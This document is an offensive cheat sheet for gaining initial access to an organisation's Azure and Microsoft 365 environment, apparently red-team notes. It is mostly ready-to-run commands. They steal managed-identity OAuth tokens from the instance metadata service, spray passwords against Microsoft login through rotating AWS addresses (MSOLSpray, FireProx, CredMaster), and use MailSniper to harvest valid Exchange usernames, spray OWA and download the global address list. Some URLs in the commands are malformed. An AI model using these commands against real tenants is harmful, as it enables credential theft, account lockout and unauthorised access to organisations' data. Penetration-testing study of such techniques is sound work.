Initial Access

Getting the initial foothold in organization’s Azure cloud environment:

Exploiting Web App

- Public Azure Instances

Misconfigured Azure Instances can be publicly accessible, allowing unauthorized users to read, write, or delete the contents. Ensuring proper bucket policies and access controls is critical to prevent data leakage.

If we can exploit a public facing application, we can retrieve an access token of managed identity attached to vm:

curl -H "Metadata:true" "http://{instance IP}/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"

One-liner to retrieves an OAuth2 token for the managed identity and the instance metadata from Azure Instance Metadata Service (IMDS):

$token = Invoke-WebRequest -Uri '{instance IP}http:///metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com' -Method GET -Headers @{Metadata="true"} -UseBasicParsing; $instance = Invoke-WebRequest -Uri '{instance IP}http:///metadata/instance?api-version=2018-02-01' -Method GET -Headers @{Metadata="true"} -UseBasicParsing; $instance

Valid Credential

- Password Spray

MSOLSpray + FireProx

To perform a password spraying using MSOLSpray along with FireProx to perform each request from diffrent AWS Ips:

python fire.py --access_key <access_key_id> --secret_access_key <secret_access_key> --region <region> --url https://login.microsoft.com --command create

Invoke-MSOLSpray -UserList .\userlist.txt -Password Spring2020 -URL https://apigateway-endpoint-id.execute-api.us-east-1.amazonaws.com/fireprox

CredMaster

A Password Spraying with AWS can also be automated agains O365 and other services with CredMaster (https://github.com/knavesec/CredMaster):

python3 credmaster.py --plugin 0365 -u users.txt -p passwords.txt -a useragents.txt --config aws.config

MailSniper.ps1

Import MailSniper.ps1:

ipmo C:\Tools\MailSniper\MailSniper.ps1

Enumerate the NetBIOS name of the target domain with Invoke-DomainHarvestOWA.

Invoke-DomainHarvestOWA -ExchHostname {url of the excahnge server}

Then we need to get valid usernames from the list of users enumerated (OSINT/Username OSINT Section)

Invoke-UsernameHarvestOWA uses a timing attack to validate which (if any) of these usernames are valid.

Invoke-UsernameHarvestOWA -ExchHostname {url of the excahnge server} -Domain {domain previouslly extracted} -UserList {username list} -OutFile .\Desktop\valid.txt

MailSniper can spray passwords against the valid account(s) identified using, Outlook Web Access (OWA), Exchange Web Services (EWS) and Exchange ActiveSync (EAS).

Invoke-PasswordSprayOWA -ExchHostname {url of the excahnge server} -UserList .\Desktop\valid.txt -Password Summer2022

These authentication attempts may count towards the domain lockout policy for the users. Too many attempts in a short space of time are not only loud but may also lock accounts out.

To download the global address list with valid creds:

Get-GlobalAddressList -ExchHostname {url of the excahnge server} -UserName {domain}\{user} -Password Summer2022 -OutFile .\Desktop\gal.txt

If there are names here that we didn't find during initial recon, we can go back and do another round of spraying against them.